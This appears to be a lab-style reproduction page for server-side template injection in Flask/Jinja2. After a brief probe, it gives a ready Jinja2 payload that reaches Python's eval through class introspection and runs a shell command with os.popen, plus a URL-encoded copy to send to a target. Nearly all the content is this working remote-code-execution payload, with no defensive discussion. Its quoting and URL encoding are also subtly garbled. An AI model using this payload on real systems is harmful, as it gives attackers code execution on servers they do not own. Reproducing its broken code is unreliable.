Flask（Jinja2） 服务端模板注入漏洞

原理

参考文章

https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf

http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates

漏洞复现

Visit http://your-ip/?name={{233*233}} and get 54289, indicating that the SSTI vulnerability exists.

Get the POC of the eval function and execute arbitrary python code:

1

2

3

4

5

6

7

8

9

10

11

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__=='catch_warnings' %}

{% for b in c.__init__.__globals__.values() %}

{% if b.__class__=={}.__class__ %}

{% if 'eval' in b.keys() %}

{{ b['eval']('__import__('os').popen('id').read()') }}

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

Visit http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%20%27catch_warnings%2 7%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20 %20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D% 0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D, get the execution result: